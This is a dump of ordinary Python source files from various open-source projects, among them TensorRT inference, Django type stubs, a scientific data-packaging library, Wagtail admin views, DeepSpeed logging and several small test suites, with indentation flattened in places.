image_src = cv2.imread(image_path)
num_classes = 80
        for i in range(2):  # run inference twice as a quick speed check,
            # because the first iteration is usually slower (warm-up)
boxes = detect(context, buffers, image_src, image_size, num_classes)
if num_classes == 20:
namesfile = 'data/voc.names'
elif num_classes == 80:
namesfile = 'data/coco.names'
else:
namesfile = 'data/names'
class_names = load_class_names(namesfile)
plot_boxes_cv2(image_src, boxes[0], savename='predictions_trt.jpg', class_names=class_names)
def get_engine(engine_path):
# If a serialized engine exists, use it instead of building an engine.
print("Reading engine from file {}".format(engine_path))
with open(engine_path, "rb") as f, trt.Runtime(TRT_LOGGER) as runtime:
return runtime.deserialize_cuda_engine(f.read())
def detect(context, buffers, image_src, image_size, num_classes):
IN_IMAGE_H, IN_IMAGE_W = image_size
ta = time.time()
# Input
resized = cv2.resize(image_src, (IN_IMAGE_W, IN_IMAGE_H), interpolation=cv2.INTER_LINEAR)
img_in = cv2.cvtColor(resized, cv2.COLOR_BGR2RGB)
img_in = np.transpose(img_in, (2, 0, 1)).astype(np.float32)
img_in = np.expand_dims(img_in, axis=0)
img_in /= 255.0
img_in = np.ascontiguousarray(img_in)
print("Shape of the network input: ", img_in.shape)
# print(img_in)
inputs, outputs, bindings, stream = buffers
print('Length of inputs: ', len(inputs))
inputs[0].host = img_in
trt_outputs = do_inference(context, bindings=bindings, inputs=inputs, outputs=outputs, stream=stream)
print('Len of outputs: ', len(trt_outputs))
trt_outputs[0] = trt_outputs[0].reshape(1, -1, 1, 4)
trt_outputs[1] = trt_outputs[1].reshape(1, -1, num_classes)
tb = time.time()
print('-----------------------------------')
print(' TRT inference time: %f' % (tb - ta))
print('-----------------------------------')
boxes = post_processing(img_in, 0.4, 0.6, trt_outputs)
return boxes
if __name__ == '__main__':
engine_path = sys.argv[1]
image_path = sys.argv[2]
if len(sys.argv) < 4:
image_size = (416, 416)
elif len(sys.argv) < 5:
image_size = (int(sys.argv[3]), int(sys.argv[3]))
else:
image_size = (int(sys.argv[3]), int(sys.argv[4]))
main(engine_path, image_path, image_size)
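# --- Editor's usage note ---
# Expected invocation, inferred from the argv handling above; the engine
# and image paths are placeholders:
#
#     python demo_trt.py yolov4.engine data/dog.jpg 416 416
#
# The TensorRT engine must have been serialized beforehand; this script
# only deserializes and runs it.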
|
650039535f4d77b2f8dc7557b5f62f74e3667005
|
2ad93a1cf25a580fe980482d2d17a657de3b2523
|
/django-stubs/db/utils.pyi
|
a04919a5e92e615590e28cf7dee6551d53feb24c
|
[
"MIT"
] |
permissive
|
typeddjango/django-stubs
|
f35dfcb001e54694a0a1e8c0afcc6e6a3d130c32
|
0117348c3c7713f25f96b46e53ebdeed7bdba544
|
refs/heads/master
| 2023-08-25T19:42:52.707151
| 2023-08-23T15:13:25
| 2023-08-23T15:13:25
| 142,779,680
| 1,133
| 376
|
MIT
| 2023-09-13T19:05:06
| 2018-07-29T17:08:50
|
Python
|
UTF-8
|
Python
| false
| false
| 2,061
|
pyi
|
utils.pyi
|
from collections.abc import Iterable
from types import TracebackType
from typing import Any
from django.apps import AppConfig
from django.db.backends.base.base import BaseDatabaseWrapper
from django.db.models import Model
from django.utils.connection import BaseConnectionHandler
DEFAULT_DB_ALIAS: str
DJANGO_VERSION_PICKLE_KEY: str
class Error(Exception): ...
class InterfaceError(Error): ...
class DatabaseError(Error): ...
class DataError(DatabaseError): ...
class OperationalError(DatabaseError): ...
class IntegrityError(DatabaseError): ...
class InternalError(DatabaseError): ...
class ProgrammingError(DatabaseError): ...
class NotSupportedError(DatabaseError): ...
class DatabaseErrorWrapper:
def __init__(self, wrapper: Any) -> None: ...
def __enter__(self) -> None: ...
def __exit__(
self,
exc_type: type[BaseException] | None,
exc_value: BaseException | None,
exc_tb: TracebackType | None,
) -> None: ...
def load_backend(backend_name: str) -> Any: ...
class ConnectionHandler(BaseConnectionHandler[BaseDatabaseWrapper]):
@property
def databases(self) -> dict[str, dict[str, Any]]: ...
def ensure_defaults(self, alias: str) -> None: ...
def prepare_test_settings(self, alias: str) -> None: ...
def create_connection(self, alias: str) -> BaseDatabaseWrapper: ...
def close_all(self) -> None: ...
class ConnectionRouter:
def __init__(self, routers: Iterable[Any] | None = ...) -> None: ...
@property
def routers(self) -> list[Any]: ...
def db_for_read(self, model: type[Model], **hints: Any) -> str: ...
def db_for_write(self, model: type[Model], **hints: Any) -> str: ...
def allow_relation(self, obj1: Model, obj2: Model, **hints: Any) -> bool: ...
def allow_migrate(self, db: str, app_label: str, **hints: Any) -> bool: ...
def allow_migrate_model(self, db: str, model: type[Model]) -> bool: ...
def get_migratable_models(
self, app_config: AppConfig, db: str, include_auto_created: bool = ...
) -> list[type[Model]]: ...
|
255cad0c2701319ae4c1f9d71a6b64bde50f05a2
|
ead6ec54c304046e8017289ecae2acb69f2e463d
|
/flotilla/datapackage.py
|
e24daa23ebd2e3e0bb9ccdca81e9fb2a750f3381
|
[] |
permissive
|
YeoLab/flotilla
|
93e3576002f1b51917bc8576897d399176e1fa3a
|
31da64567e59003c2b9c03fc8f4eb27ee62e299c
|
refs/heads/master
| 2023-04-28T04:23:30.408159
| 2017-04-19T07:03:03
| 2017-04-19T07:03:03
| 19,319,564
| 104
| 27
|
BSD-3-Clause
| 2023-04-15T19:16:52
| 2014-04-30T16:14:31
|
Jupyter Notebook
|
UTF-8
|
Python
| false
| false
| 8,322
|
py
|
datapackage.py
|
"""
Functions to deal with creation and loading of datapackages
"""
from __future__ import (absolute_import, division,
print_function, unicode_literals)
from six import iteritems
# Python 2 and 3 code for urllib module
# http://python-future.org/compatible_idioms.html
try:
from urllib.request import Request, build_opener
except ImportError:
from urllib2 import Request, build_opener
# import gzip # TODO compression
import json
import os
# import string
import sys
import matplotlib as mpl
FLOTILLA_DOWNLOAD_DIR = os.path.expanduser('~/flotilla_projects')
def datapackage_url_to_dict(datapackage_url):
filename = check_if_already_downloaded(datapackage_url)
with open(filename) as f:
datapackage = json.load(f)
return datapackage
def check_if_already_downloaded(url,
datapackage_name=None,
download_dir=FLOTILLA_DOWNLOAD_DIR):
"""Download a url filename, unless it has already been downloaded.
Save into directory named 'datapackage_name' if provided,
otherwise save in directory named after value for key'name' in json file
Parameters
----------
url : str
HTTP url of a file you want to download
Returns
-------
filename : str
Location of the file on your system
"""
try:
os.mkdir(download_dir)
sys.stdout.write('Creating a directory for saving your flotilla '
'projects: {}\n'.format(download_dir))
except OSError:
pass
if datapackage_name is None:
req = Request(url)
opener = build_opener()
opened_url = opener.open(req)
datapackage = json.loads(opened_url.read())
datapackage_name = datapackage['name']
package_dir = '{}/{}'.format(download_dir, datapackage_name)
try:
os.mkdir(package_dir)
sys.stdout.write('Creating a directory for saving the data for this '
'project: {}\n'.format(package_dir))
except OSError:
pass
basename = url.rsplit('/', 1)[-1]
filename = os.path.expanduser(os.path.join(package_dir, basename))
if not os.path.isfile(filename):
sys.stdout.write('{} has not been downloaded before.\n\tDownloading '
'now to {}\n'.format(url, filename))
req = Request(url)
opener = build_opener()
opened_url = opener.open(req)
        with open(filename, 'wb') as f:  # urlopen returns bytes under Python 3
f.write(opened_url.read())
return filename
def write_small_or_big_data(data, resource_name, datapackage_dir,
max_size=1e7):
"""Save dataframe as a gzipped CSV if small, HDF if large
"Large" is determined from the product of the data shape, with a maximum
of `max_size`.
Parameters
----------
data : pandas.DataFrame
The data to save
resource_name : str
Name of the data for saving
datapackage_dir : str
Absolute path, where to save the data to
max_size : int or float
Maximum size of the data to save as a "smaller" CSV format, where
ncol*nrow < max_size
Returns
-------
info : dict
Information about the written file, e.g. path, format, compression to
save with the datapackage
"""
nrow, ncol = data.shape
info = {}
if nrow * ncol < max_size:
# If data is smallish, save as a gzipped csv
# TODO compression
# basename = '{}.csv.gz'.format(resource_name)
basename = '{}.csv'.format(resource_name)
data_filename = '{}/{}'.format(datapackage_dir, basename)
with open(data_filename, 'w') as f:
data.to_csv(f)
# TODO compression
# info['compression'] = 'gzip'
info['format'] = 'csv'
else:
# If data is big, save as an HDF file
basename = '{}.hdf'.format(resource_name)
data_filename = '{}/{}'.format(datapackage_dir, basename)
key = 'data'
info['format'] = 'hdf'
info['key'] = key
data.to_hdf(data_filename, key)
info['path'] = basename
return info
def make_study_datapackage(study_name, metadata,
expression_data=None,
splicing_data=None,
mapping_stats_data=None,
title='',
sources='', license=None, species=None,
flotilla_dir=FLOTILLA_DOWNLOAD_DIR,
metadata_kws=None,
expression_kws=None,
splicing_kws=None,
mapping_stats_kws=None,
version=None,
expression_feature_kws=None,
expression_feature_data=None,
splicing_feature_data=None,
splicing_feature_kws=None,
gene_ontology=None,
supplemental_kws=None,
host="https://s3-us-west-2.amazonaws.com/",
host_destination='flotilla-projects/'):
"""Example code for making a datapackage for a Study"""
if len(study_name.split()) > 1:
raise ValueError("Datapackage name cannot have any whitespace")
# if set(string.uppercase) & set(study_name):
if not study_name.lower() == study_name:
raise ValueError("Datapackage can only contain lowercase letters")
datapackage_dir = '{}/{}'.format(flotilla_dir, study_name)
try:
os.makedirs(datapackage_dir)
except OSError:
pass
supplemental_kws = {} if supplemental_kws is None else supplemental_kws
datapackage = {'name': study_name, 'title': title, 'sources': sources,
'licenses': license, 'datapackage_version': version}
if species is not None:
datapackage['species'] = species
resources = {'metadata': (metadata, metadata_kws),
'expression': (expression_data, expression_kws),
'splicing': (splicing_data, splicing_kws),
'mapping_stats': (mapping_stats_data, mapping_stats_kws),
'expression_feature': (expression_feature_data,
expression_feature_kws),
'splicing_feature': (splicing_feature_data,
splicing_feature_kws),
'gene_ontology': (gene_ontology, {})}
datapackage['resources'] = []
for resource_name, (data, kws) in resources.items():
if data is None:
continue
datapackage['resources'].append({'name': resource_name})
resource = datapackage['resources'][-1]
info = write_small_or_big_data(data, resource_name, datapackage_dir)
resource.update(info)
if kws is not None:
for key, value in iteritems(kws):
if key == 'phenotype_to_color':
value = dict((k, mpl.colors.rgb2hex(v))
if isinstance(v, tuple) else
(k, v)
for k, v in iteritems(value)
)
resource[key] = value
datapackage['resources'].append({'name': 'supplemental'})
supplemental = datapackage['resources'][-1]
supplemental['resources'] = []
for supplemental_name, data in supplemental_kws.items():
resource = {}
resource['name'] = supplemental_name
info = write_small_or_big_data(data, supplemental_name,
datapackage_dir)
resource.update(info)
supplemental['resources'].append(resource)
filename = '{}/datapackage.json'.format(datapackage_dir)
with open(filename, 'w') as f:
json.dump(datapackage, f, indent=2)
sys.stdout.write('Wrote datapackage to {}\n'.format(filename))
def name_to_resource(datapackage, name):
"""Get resource with specified name in the datapackage"""
for resource in datapackage['resources']:
if resource['name'] == name:
return resource
raise ValueError('No resource named {} in this datapackage'.format(name))
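# --- Editor's hedged usage sketch (not from the flotilla docs) ---
# A minimal call to make_study_datapackage, assuming `metadata` and
# `expression` are pandas DataFrames indexed by sample ID; all values
# below are illustrative.
#
# import pandas as pd
# metadata = pd.DataFrame({'phenotype': ['a', 'b']}, index=['s1', 's2'])
# expression = pd.DataFrame([[1.0, 2.0], [3.0, 4.0]],
#                           index=['s1', 's2'], columns=['gene1', 'gene2'])
# make_study_datapackage('mystudy', metadata, expression_data=expression,
#                        title='My study', version='0.1.0')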
|
b5dc868863f35b82be780114672828b24b1d6c19
|
70fec09ceb625608d561937955c285c0c39f6d95
|
/tomodachi/invoker/__init__.py
|
da4dea0c2ac0c99114178f57ba099536c261e26a
|
[
"MIT"
] |
permissive
|
kalaspuff/tomodachi
|
b285e2c73696d14e3c84a479745e00824fba7190
|
deca849ec2b4cdc3d27f06e9ce0056fac0146a1a
|
refs/heads/master
| 2023-08-31T00:32:12.042486
| 2023-08-21T13:02:24
| 2023-08-21T13:02:24
| 62,165,703
| 191
| 28
|
MIT
| 2023-09-11T23:32:51
| 2016-06-28T18:43:51
|
Python
|
UTF-8
|
Python
| false
| false
| 270
|
py
|
__init__.py
|
from .base import FUNCTION_ATTRIBUTE, INVOKER_TASK_START_KEYWORD, START_ATTRIBUTE, Invoker # noqa
from .decorator import decorator # noqa
__all__ = [
"FUNCTION_ATTRIBUTE",
"INVOKER_TASK_START_KEYWORD",
"START_ATTRIBUTE",
"Invoker",
"decorator",
]
|
1dbe4817643e74deeef7adb41c3f09f9ff870d46
|
529e713a78e82de2ae5d44cfb8ef209e0894d72a
|
/subprocess/basics_win.py
|
e7a2f9939d0e360b6fe518853ca08bb330f7621f
|
[
"MIT"
] |
permissive
|
realpython/materials
|
cd2f548276be2c82f134ca03eadb1cd279e0f26e
|
d2d62756d3854f54a12a767f2bf9470486c0ceef
|
refs/heads/master
| 2023-09-05T22:12:29.806738
| 2023-08-31T20:56:28
| 2023-08-31T20:56:28
| 132,374,697
| 4,678
| 6,482
|
MIT
| 2023-09-12T22:22:06
| 2018-05-06T20:46:18
|
HTML
|
UTF-8
|
Python
| false
| false
| 498
|
py
|
basics_win.py
|
"""
**Only works on Windows**
Demonstrates basic usage of `subprocess.run()`.
"""
import subprocess
# https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/cmd
subprocess.run("dir", shell=True) # COMSPEC env variable
subprocess.run(["cmd.exe", "/c", "dir"])
# https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.core/about/about_pwsh?view=powershell-7.2
subprocess.run(["powershell", "-Command", "ls"])
subprocess.run(["python", "helloworld.py"])
|
7136158ed013de9464ca51f7d2d06dbbc17a3fbb
|
d1f15554df2d5c0f74ddbcba6e870359841f682b
|
/wagtail/admin/views/pages/usage.py
|
d42a594e6f9a8f383134b79d2ac08647acd63cc1
|
[
"BSD-3-Clause",
"LicenseRef-scancode-proprietary-license"
] |
permissive
|
wagtail/wagtail
|
bd405f89b86e0c625fef0685fd6bfba41cf5cbfc
|
06a7bc6124bf62675c09fbe0a4ed9bbac183e025
|
refs/heads/main
| 2023-09-04T06:22:51.601208
| 2023-09-01T15:22:00
| 2023-09-01T15:22:00
| 16,479,108
| 12,974
| 3,580
|
BSD-3-Clause
| 2023-09-14T10:45:04
| 2014-02-03T12:41:59
|
Python
|
UTF-8
|
Python
| false
| false
| 2,858
|
py
|
usage.py
|
from typing import Any, Dict
from django.contrib.contenttypes.models import ContentType
from django.core.exceptions import PermissionDenied
from django.http import Http404
from django.urls import reverse
from django.utils.translation import gettext_lazy as _
from wagtail.admin.ui.tables import Column, DateColumn
from wagtail.admin.ui.tables.pages import (
PageStatusColumn,
PageTable,
PageTitleColumn,
ParentPageColumn,
)
from wagtail.admin.views import generic
from wagtail.admin.views.generic.base import BaseListingView
from wagtail.models import Page
class ContentTypeUseView(BaseListingView):
results_template_name = "wagtailadmin/pages/usage_results.html"
page_title = _("Pages using")
header_icon = "doc-empty-inverse"
page_kwarg = "p"
paginate_by = 50
columns = [
PageTitleColumn("title", label=_("Title")),
ParentPageColumn("parent", label=_("Parent")),
DateColumn("latest_revision_created_at", label=_("Updated"), width="12%"),
Column("type", label=_("Type"), accessor="page_type_display_name", width="12%"),
PageStatusColumn("status", label=_("Status"), width="12%"),
]
table_class = PageTable
table_classname = "listing align-top"
def get(self, request, *, content_type_app_name, content_type_model_name):
try:
content_type = ContentType.objects.get_by_natural_key(
content_type_app_name, content_type_model_name
)
except ContentType.DoesNotExist:
raise Http404
self.page_class = content_type.model_class()
# page_class must be a Page type and not some other random model
if not issubclass(self.page_class, Page):
raise Http404
return super().get(request)
def get_page_subtitle(self):
return self.page_class.get_verbose_name()
def get_queryset(self):
return self.page_class.objects.all().specific(defer=True)
def get_index_url(self):
return reverse(
"wagtailadmin_pages:type_use",
args=[
self.kwargs["content_type_app_name"],
self.kwargs["content_type_model_name"],
],
)
def get_context_data(self, **kwargs: Any) -> Dict[str, Any]:
context = super().get_context_data(**kwargs)
context.update(
{
"index_url": self.get_index_url(),
"page_class": self.page_class,
}
)
return context
class UsageView(generic.UsageView):
model = Page
pk_url_kwarg = "page_id"
header_icon = "doc-empty-inverse"
def dispatch(self, request, *args, **kwargs):
if not self.object.permissions_for_user(request.user).can_edit():
raise PermissionDenied
return super().dispatch(request, *args, **kwargs)
|
e4b0e2c36984dc8a4679add110cbbc68afdf8b2b
|
4ad53199feb82d911bd2edbe0b5713da8c1909c1
|
/test/writer/test_null_writer.py
|
5dcee68fff85e0f5a2a2e601676be069189cfed4
|
[
"MIT"
] |
permissive
|
thombashi/pytablewriter
|
9bf8b73da0eb18dba835e951021fd581958a4d12
|
49f9da777625a5b920c2c87c5e086d33d19a80d4
|
refs/heads/master
| 2023-08-19T05:13:15.333317
| 2023-07-01T08:03:47
| 2023-07-01T08:03:47
| 59,484,958
| 609
| 43
|
MIT
| 2021-09-20T15:26:45
| 2016-05-23T13:25:53
|
Python
|
UTF-8
|
Python
| false
| false
| 1,397
|
py
|
test_null_writer.py
|
"""
.. codeauthor:: Tsuyoshi Hombashi <tsuyoshi.hombashi@gmail.com>
"""
import pytablewriter
table_writer_class = pytablewriter.NullTableWriter
class Test_NullTableWriter_set_indent_level:
def test_smoke(self):
writer = table_writer_class()
writer.set_indent_level(0)
class Test_NullTableWriter_inc_indent_level:
def test_smoke(self):
writer = table_writer_class()
writer.inc_indent_level()
class Test_NullTableWriter_dec_indent_level:
def test_smoke(self):
writer = table_writer_class()
writer.dec_indent_level()
class Test_NullTableWriter_write_null_line:
def test_smoke(self, capsys):
writer = table_writer_class()
writer.write_null_line()
out, _err = capsys.readouterr()
assert out == ""
class Test_NullTableWriter_write_table:
def test_smoke(self, capsys):
writer = table_writer_class()
writer.write_table()
out, _err = capsys.readouterr()
assert out == ""
class Test_NullTableWriter_dumps:
def test_smoke(self):
writer = table_writer_class()
assert writer.dumps() == ""
assert str(writer) == ""
class Test_NullTableWriter_write_table_iter:
def test_smoke(self, capsys):
writer = table_writer_class()
writer.write_table_iter()
out, _err = capsys.readouterr()
assert out == ""
|
09d79324594e64cac05714709dc10d81ef3c233e
|
94724578994ab1438dcefb51b7ef4d8570da5d4c
|
/z42/zapp/_WEB/model/ob.py
|
ce124b570396cf5c96b989ddc7b8b8b905fc33bb
|
[] |
no_license
|
PegasusWang/collection_python
|
6648d83203634abf44fd42c0b37b0bf7cc406d8f
|
9ef019a737a0817860d3184924c67a0833bd1252
|
refs/heads/master
| 2023-09-01T23:15:39.813635
| 2023-08-24T06:46:12
| 2023-08-24T06:46:12
| 43,693,872
| 130
| 90
| null | 2021-04-26T15:12:55
| 2015-10-05T15:28:15
|
JavaScript
|
UTF-8
|
Python
| false
| false
| 1,347
|
py
|
ob.py
|
#!/usr/bin/env python
#coding:utf-8
import _env
from zapp._WEB.model._db import redis, Doc
from gid import gid
from z42.config import HOST, QINIU
from attrcache import attrcache
class Ob(Doc):
structure = dict(
id=int,
name=str,
ico=str,
)
indexes = [
{'fields':['id']}
]
@staticmethod
def new(name):
id = gid()
o = Ob(dict(id=id, name=str(name), ico=''))
o.save()
return id
def ico_new(self, ico, crop=None):
self.ico = ico
self.save()
@property
def ico_url(self):
#TODO
return ''
@property
def url(self):
#TODO
return "//%s.%s"%(self.id, HOST)
@staticmethod
def by_id_list(li):
if li:
return Ob.find({"id":{"$in":map(int,li)}})
return []
def ob_name_ico_by_id(id):
ob = Ob.find_one({'id':id})
return ob.name, ob.ico or 0
def ob_name_by_id(id):
return Ob.find_one({'id':id}).name
def name_ico_dict_by_id_list(li):
result = {}
for i in Ob.by_id_list(li):
result[i.id] = (str(i.name), i.ico or 0)
return result
def name_dict_by_id_list(li):
result = {}
for i in Ob.by_id_list(li):
result[i.id] = str(i.name)
return result
if __name__ == '__main__':
for i in Ob.find():
print i
|
6917949523231067594d25eaa925c6c9ac4aba49
|
52a677b94056d3397b4a499bc9185adb68a63f05
|
/util/test/test_dockerfileparse.py
|
199162a0ffd1642dac33e08fcf43eabdcf925230
|
[
"Apache-2.0"
] |
permissive
|
quay/quay
|
9b6fcff54efc0dbf7c6d91fa80676950555b6f1a
|
e400a0c22c5f89dd35d571654b13d262b1f6e3b3
|
refs/heads/master
| 2023-08-28T15:08:38.001842
| 2023-08-28T13:52:31
| 2023-08-28T13:52:31
| 220,517,730
| 2,363
| 322
|
Apache-2.0
| 2023-09-14T17:43:48
| 2019-11-08T17:37:05
|
Python
|
UTF-8
|
Python
| false
| false
| 1,693
|
py
|
test_dockerfileparse.py
|
# -*- coding: utf-8 -*-
from util.dockerfileparse import parse_dockerfile
def test_basic_parse():
parsed = parse_dockerfile(
"""
FROM someimage:latest
RUN dosomething
"""
)
assert parsed.get_image_and_tag() == ("someimage", "latest")
assert parsed.get_base_image() == "someimage"
def test_basic_parse_notag():
parsed = parse_dockerfile(
"""
FROM someimage
RUN dosomething
"""
)
assert parsed.get_image_and_tag() == ("someimage", "latest")
assert parsed.get_base_image() == "someimage"
def test_two_from_lines():
parsed = parse_dockerfile(
"""
FROM someimage:latest
FROM secondimage:second
"""
)
assert parsed.get_image_and_tag() == ("secondimage", "second")
assert parsed.get_base_image() == "secondimage"
def test_parse_comments():
parsed = parse_dockerfile(
"""
# FROM someimage:latest
FROM anotherimage:foobar # This is a comment
RUN dosomething
"""
)
assert parsed.get_image_and_tag() == ("anotherimage", "foobar")
assert parsed.get_base_image() == "anotherimage"
def test_unicode_parse_as_ascii():
parsed = parse_dockerfile(
"""
FROM someimage:latest
MAINTAINER José Schorr <jschorr@whatever.com>
"""
)
assert parsed.get_image_and_tag() == ("someimage", "latest")
assert parsed.get_base_image() == "someimage"
def test_unicode_parse_as_unicode():
parsed = parse_dockerfile(
"""
FROM someimage:latest
MAINTAINER José Schorr <jschorr@whatever.com>
"""
)
assert parsed.get_image_and_tag() == ("someimage", "latest")
assert parsed.get_base_image() == "someimage"
|
2fb5d34c1a28ed7dd8048090b94ff1d9d3a8dd63
|
bb33e6be8316f35decbb2b81badf2b6dcf7df515
|
/source/res/scripts/client/gui/impl/lobby/tooltips/tankman_tooltip_view.py
|
19437c1a730df0ebc2507ee4db742ffb37ad58f7
|
[] |
no_license
|
StranikS-Scan/WorldOfTanks-Decompiled
|
999c9567de38c32c760ab72c21c00ea7bc20990c
|
d2fe9c195825ececc728e87a02983908b7ea9199
|
refs/heads/1.18
| 2023-08-25T17:39:27.718097
| 2022-09-22T06:49:44
| 2022-09-22T06:49:44
| 148,696,315
| 103
| 39
| null | 2022-09-14T17:50:03
| 2018-09-13T20:49:11
|
Python
|
UTF-8
|
Python
| false
| false
| 1,710
|
py
|
tankman_tooltip_view.py
|
# Python bytecode 2.7 (decompiled from Python 2.7)
# Embedded file name: scripts/client/gui/impl/lobby/tooltips/tankman_tooltip_view.py
from frameworks.wulf import ViewSettings
from gui.impl.gen import R
from gui.impl.gen.view_models.views.lobby.tooltips.tankman_tooltip_view_model import TankmanTooltipViewModel
from gui.impl.gen.view_models.views.lobby.tooltips.tankman_tooltip_view_icon_model import TankmanTooltipViewIconModel
from gui.impl.pub import ViewImpl
class TankmanTooltipView(ViewImpl):
__slots__ = ('__tankmanInfo',)
def __init__(self, tankmanInfo):
settings = ViewSettings(R.views.lobby.tooltips.TankmanTooltipView())
settings.model = TankmanTooltipViewModel()
self.__tankmanInfo = tankmanInfo
super(TankmanTooltipView, self).__init__(settings)
@property
def viewModel(self):
return super(TankmanTooltipView, self).getViewModel()
def _onLoading(self, *args, **kwargs):
super(TankmanTooltipView, self)._onLoading()
with self.viewModel.transaction() as model:
model.setTitle(self.__tankmanInfo.getFullUserName())
model.setSubtitle(self.__tankmanInfo.getLabel())
model.setMainIcon(self.__tankmanInfo.getTankmanIcon())
model.setDescription(self.__tankmanInfo.getDescription())
model.setIconsTitle(self.__tankmanInfo.getSkillsLabel())
skillsModel = model.icons
skillsModel.clearItems()
for skill in self.__tankmanInfo.getSkills():
skillModel = TankmanTooltipViewIconModel()
skillModel.setIcon(skill)
skillsModel.addViewModel(skillModel)
skillsModel.invalidate()
|
1388116c542a032d22110fa0d548845e12066270
|
483424524c70852cc043e0d77bf1b757a61d797a
|
/deepspeed/monitor/wandb.py
|
30209191171afc4c0ad3ff7088639f7d678cd505
|
[
"Apache-2.0",
"LicenseRef-scancode-generic-cla"
] |
permissive
|
microsoft/DeepSpeed
|
810f1af320020718d0794f5a97cde6f1d17af122
|
55d9964c59c0c6e23158b5789a5c36c28939a7b0
|
refs/heads/master
| 2023-09-06T07:40:52.145692
| 2023-09-05T23:51:23
| 2023-09-05T23:51:23
| 235,860,204
| 27,557
| 3,347
|
Apache-2.0
| 2023-09-14T21:38:46
| 2020-01-23T18:35:18
|
Python
|
UTF-8
|
Python
| false
| false
| 1,150
|
py
|
wandb.py
|
# Copyright (c) Microsoft Corporation.
# SPDX-License-Identifier: Apache-2.0
# DeepSpeed Team
from .utils import check_wandb_availability
from .monitor import Monitor
import deepspeed.comm as dist
class WandbMonitor(Monitor):
def __init__(self, wandb_config):
super().__init__(wandb_config)
check_wandb_availability()
import wandb
self.enabled = wandb_config.enabled
self.group = wandb_config.group
self.team = wandb_config.team
self.project = wandb_config.project
if self.enabled and dist.get_rank() == 0:
wandb.init(project=self.project, group=self.group, entity=self.team)
def log(self, data, step=None, commit=None, sync=None):
if self.enabled and dist.get_rank() == 0:
import wandb
return wandb.log(data, step=step, commit=commit, sync=sync)
def write_events(self, event_list):
if self.enabled and dist.get_rank() == 0:
for event in event_list:
label = event[0]
value = event[1]
step = event[2]
self.log({label: value}, step=step)
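# --- Editor's hedged usage sketch (not part of DeepSpeed) ---
# WandbMonitor only reads .enabled/.group/.team/.project from its config
# (see __init__ above), so a simple namespace is enough to exercise it in
# an initialized distributed run. Project/group names are placeholders.
#
# from types import SimpleNamespace
# cfg = SimpleNamespace(enabled=True, group=None, team=None, project="demo")
# monitor = WandbMonitor(cfg)
# monitor.write_events([("Train/loss", 0.42, 100)])  # (label, value, step)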
|
5976dc24e3ff6475b744d25a64bf2501f87a9898
|
eb9f655206c43c12b497c667ba56a0d358b6bc3a
|
/python/testData/completion/superMethodAnnotationsCopiedFromThirdPartyLibrary/src/a.after.py
|
50c2283b5c5c2f37b366425e8e1edece1d2623bd
|
[
"Apache-2.0"
] |
permissive
|
JetBrains/intellij-community
|
2ed226e200ecc17c037dcddd4a006de56cd43941
|
05dbd4575d01a213f3f4d69aa4968473f2536142
|
refs/heads/master
| 2023-09-03T17:06:37.560889
| 2023-09-03T11:51:00
| 2023-09-03T12:12:27
| 2,489,216
| 16,288
| 6,635
|
Apache-2.0
| 2023-09-12T07:41:58
| 2011-09-30T13:33:05
| null |
UTF-8
|
Python
| false
| false
| 85
|
py
|
a.after.py
|
from mod import Super
class Sub(Super):
def method(self, x: int) -> str:<caret>
|
89bd0cfef5c06dcfad81154d9bdc3cb86ef16c25
|
1abd8852158451ffe4dbe0d885e2be0ed1dd50d8
|
/drafts/distance_to_line.py
|
93512845d979a33c19336094f08c15b69c78d556
|
[
"Unlicense"
] |
permissive
|
akalenuk/wordsandbuttons
|
f7c1479ce08fc9f01d1043ed54b2dbd330003e79
|
ef0c89ec06452a0b1913d849039b399708eae957
|
refs/heads/master
| 2023-08-30T04:07:14.672481
| 2023-08-24T07:18:04
| 2023-08-24T07:18:04
| 110,279,805
| 440
| 25
|
Unlicense
| 2020-05-22T15:58:51
| 2017-11-10T18:30:49
|
HTML
|
UTF-8
|
Python
| false
| false
| 270
|
py
|
distance_to_line.py
|
from sympy import *
from sympy.vector import *
x, y, x1, y1, x2, y2, a = symbols('x y x1 y1 x2 y2 a')
N = CoordSys3D('N')
p = x*N.i + y*N.j
l1 = x1*N.i + y1*N.j
l2 = x2*N.i + y2*N.j
the_a = solve([
dot(l1 + (l2 - l1) * a - p, l2 - l1)
], (a))
print (jscode(the_a))
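# --- Editor's note: closed-form check ---
# Solving dot(l1 + (l2 - l1)*a - p, l2 - l1) = 0 for a gives the standard
# projection parameter
#     a = ((p - l1) . (l2 - l1)) / |l2 - l1|^2
# so the generated JS code should match:
# expected = dot(p - l1, l2 - l1) / dot(l2 - l1, l2 - l1)
# print(simplify(the_a[a] - expected))  # expected output: 0
# (indexing into the solve() result may vary across sympy versions)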
|
09ada2d9b43799d1b172358d3ca4a73f03b831af
|
05599a7cebc38c40baa4ec0e48308a83f0bacd3b
|
/tests/test_tda.py
|
e3578999547fbfd12487903fe06cc58561793957
|
[
"MIT"
] |
permissive
|
jmfernandes/robin_stocks
|
4c0fc06fe1ee7c333b9768b9619729807826a5e2
|
6dc9dacae3e8882ffed3e3cf0eced02b147ef575
|
refs/heads/master
| 2023-08-26T05:22:55.301054
| 2023-08-07T02:52:43
| 2023-08-07T02:52:43
| 122,554,275
| 1,618
| 510
|
MIT
| 2023-08-25T17:22:23
| 2018-02-23T00:49:37
|
Python
|
UTF-8
|
Python
| false
| false
| 571
|
py
|
test_tda.py
|
import os
import robin_stocks.tda as t
from dotenv import load_dotenv
load_dotenv()
class TestAuthentication:
def test_login(self):
t.login(os.environ['tda_encryption_passcode'])
assert t.get_login_state()
class TestStocks:
ticker = "TSLA"
@classmethod
def setup_class(cls):
t.login(os.environ['tda_encryption_passcode'])
def test_quote(self):
resp, err = t.get_quote(self.ticker)
data = resp.json()
assert resp.status_code == 200
assert err is None
assert self.ticker in data
|
443bc527d7aea038a9d39854311732b622af639c
|
3a05bb0d4a598d18e9c90c0a35bd44556fcd94d3
|
/ask-sdk-model/ask_sdk_model/services/api_client.py
|
20507f064b0755d35d56d14a1aa0b3ca750358e5
|
[
"Apache-2.0"
] |
permissive
|
alexa/alexa-apis-for-python
|
2e21330c7e35b76e4f360aa72a9e789906f3bca1
|
751e6dbbb829ceb34dd7405eb77235c06b19c612
|
refs/heads/master
| 2023-08-28T12:50:05.522913
| 2023-08-21T16:04:58
| 2023-08-21T16:04:58
| 145,045,841
| 119
| 34
|
Apache-2.0
| 2022-07-19T16:40:29
| 2018-08-16T22:40:28
|
Python
|
UTF-8
|
Python
| false
| false
| 1,499
|
py
|
api_client.py
|
# -*- coding: utf-8 -*-
#
